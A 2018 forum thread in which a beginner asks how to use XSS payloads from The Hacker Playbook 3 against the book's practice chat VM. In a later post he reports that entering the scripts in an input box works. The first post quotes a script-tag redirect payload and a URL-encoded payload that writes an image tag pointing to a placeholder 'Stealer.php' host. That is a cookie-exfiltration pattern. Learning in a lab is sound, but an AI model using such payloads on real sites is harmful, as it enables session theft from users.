XSS Scripting for Beginner

Discussion in 'Scripting' started by Mlke9876, Jun 10, 2018.

  1. Mlke9876

    Mlke9876 MDL Member

    Feb 13, 2012
    207
    5
    10
    Hi, this might be an easy question but here goes...I'm reading The Hacker Playbook v3 and I'm on XSS. I have "ChatSupportNode" Virtual Machine from THP v3 website. My problem is, none of the XSS scripts in the Book work. So how do I start each line?
    http://chat:xxxx<script>window.location = "[youtube]";</script>
    I'm not sure if I should use a "/" or "?" (or anything else) in between the end of the URL (http://chat:xxxx "/" or "?") Like I said an easy question but I'm just starting with XSS. I know I'm doing it wrong because none of them work. They're supposed to pop up a message or alert on the "chat:xxxx". Or redirect, etc...When I try using / or ? at the end it says:
    Cannot GET /chatchannel/1/%3Cscript%3Edocument.write('%3Cimg%20src=%22http://%3CYour%20IP%3E/Stealer.php
    So can anyone explain how to use XSS? What's an example including URL and XSS script. Then I can try more XSS testing. Please reply. Thanks
     
  2. Mlke9876

    Mlke9876 MDL Member

    Feb 13, 2012
    207
    5
    10
    I'm back. I kinda figured it out. I guess you have to enter the script in a box, not one the URL? I don't know what I was thinking. The XSS is working on my ChatSupportSystems VM. Any other tips? I'm just getting started.
     
  3. Mlke9876

    Mlke9876 MDL Member

    Feb 13, 2012
    207
    5
    10
    On to the next chapter. I'll mark this solved.